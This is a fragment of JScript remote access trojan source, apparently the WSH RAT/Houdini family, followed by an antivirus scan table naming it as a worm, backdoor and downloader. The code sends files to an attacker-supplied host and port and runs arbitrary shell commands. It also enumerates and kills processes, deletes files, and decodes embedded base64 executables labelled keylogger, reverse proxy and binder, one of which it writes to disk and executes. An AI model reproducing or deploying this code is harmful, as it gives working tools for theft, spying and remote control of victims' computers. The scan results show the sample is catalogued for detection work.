var httpobj,objstreamuploade,buffer;
var objstreamuploade = WScript.CreateObject("adodb.stream");
objstreamuploade.Type = 1;
objstreamuploade.Open();
objstreamuploade.loadFromFile(fileurl);
buffer = objstreamuploade.Read();
objstreamuploade.close();
objstreamdownload = null;
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
httpobj.open("post","http://" + host + ":" + port +"/" + retcmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(buffer);
}catch(er){
updatestatus("Upload+Failed");
function deletefaf (url){
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
}catch(err){}
function cmdshell (cmd){
var httpobj,oexec,readallfromany;
var strsaveto = installdir + "out.txt";
shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
filesystemobj.deleteFile(strsaveto);
}catch(ee){}
return readallfromany;
function enumprocess(){
var ep = "";
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
ep = ep + objitem.name + "^";
ep = ep + objitem.processId + "^";
ep = ep + objitem.executablePath + spliter;
}catch(er){}
return ep;
function exitprocess (pid){
shellobj.run("taskkill /F /T /PID " + pid,0,true);
}catch(err){}
function getParentDirectory(path){
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
function enumfaf (enumdir){
var re = "";
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).subfolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
re = re + folder.name + "^^d^" + folder.attributes + spliter;
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
}catch(err){}
return re;
function getKeyLogger(){
var encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAF7t0lwAAAAAAAAAAOAAAgELAQsAAFIAAAAQAAAAAAAArnEAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADgAAAABAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFRxAABXAAAAAKAAAGgKAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAwAAAAAgAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtFEAAAAgAAAAUgAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAAJsAAAAAgAAAAAIAAABWAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAABoCgAAAKAAAAAMAAAAWAAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAADAAAAAAgAAAGQAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getRDP(){
var encoded = "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
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getReverseProxy(){
var encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAA7fSl0AAAAAAAAAAOAAAgELAQsAADQAAAAQAAAAAAAArlIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAABAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBSAABLAAAAAIAAAKgKAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAYAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtDIAAAAgAAAANAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAAKQAAAAAYAAAAAIAAAA4AAAAAAAAAAAAAAAAAABAAADALnJzcmMAAACoCgAAAIAAAAAMAAAAOgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAACgAAAAAgAAAEYAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
function getBinder(){
var encoded = "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
if(encoded != "[binder1]"){
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}else{
return null;
function runBinder(){
var strsaveto = installdir + "Output.js";
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getBinder());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\"");
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Txt.Packed.Cryxos-7111887-0
CMC Clean
CAT-QuickHeal VBS.Agent.34768
Skyhigh BehavesLike.JS.Downloader.bm
ALYac Backdoor.MSIL.Agent.IU
Malwarebytes Clean
VIPRE JS:Trojan.Cryxos.3662
Sangfor Trojan.Generic-JS.Save.OnlyJS
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Trojan Horse
ESET-NOD32 JS/Vjworm.CD
TrendMicro-HouseCall Clean
Avast JS:ADODB-BL [Expl]
Cynet Malicious (score: 99)
Kaspersky HEUR:Worm.Script.Dinihou.gen
BitDefender JS:Trojan.Cryxos.3662
NANO-Antivirus Trojan.Script.Dropper.foxxbq
ViRobot Clean
MicroWorld-eScan JS:Trojan.Cryxos.3662
Rising Backdoor.Houdini/JS!1.C2BA (CLASSIC)
Sophos JS/Vjworm-Y
Baidu Clean
F-Secure Malware.HTML/ExpKit.Gen2
DrWeb JS.Spy.16
Zillya Clean
TrendMicro HEUR_JSRANSOM.O4
FireEye JS:Trojan.Cryxos.3662
Emsisoft JS:Trojan.Cryxos.3662 (B)
GData Script.Backdoor.WSHRAT.B
Jiangmin Clean
Varist JS/Worm.D
Avira HTML/ExpKit.Gen2
MAX malware (ai score=88)
Antiy-AVL Clean
Kingsoft Script.Ks.Malware.9344
Gridinsoft Clean
Xcitium Worm.JS.Vjworm.AK@8cyo73
Arcabit JS:Trojan.Cryxos.DE4E [many]
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Worm.Script.Dinihou.gen
Microsoft Trojan:VBS/Irsaz.B
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee VBS/Autorun.worm.aaha
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Worm.JS.Vjworm
MaxSecure Clean
Fortinet Clean
AVG JS:ADODB-BL [Expl]
Panda Clean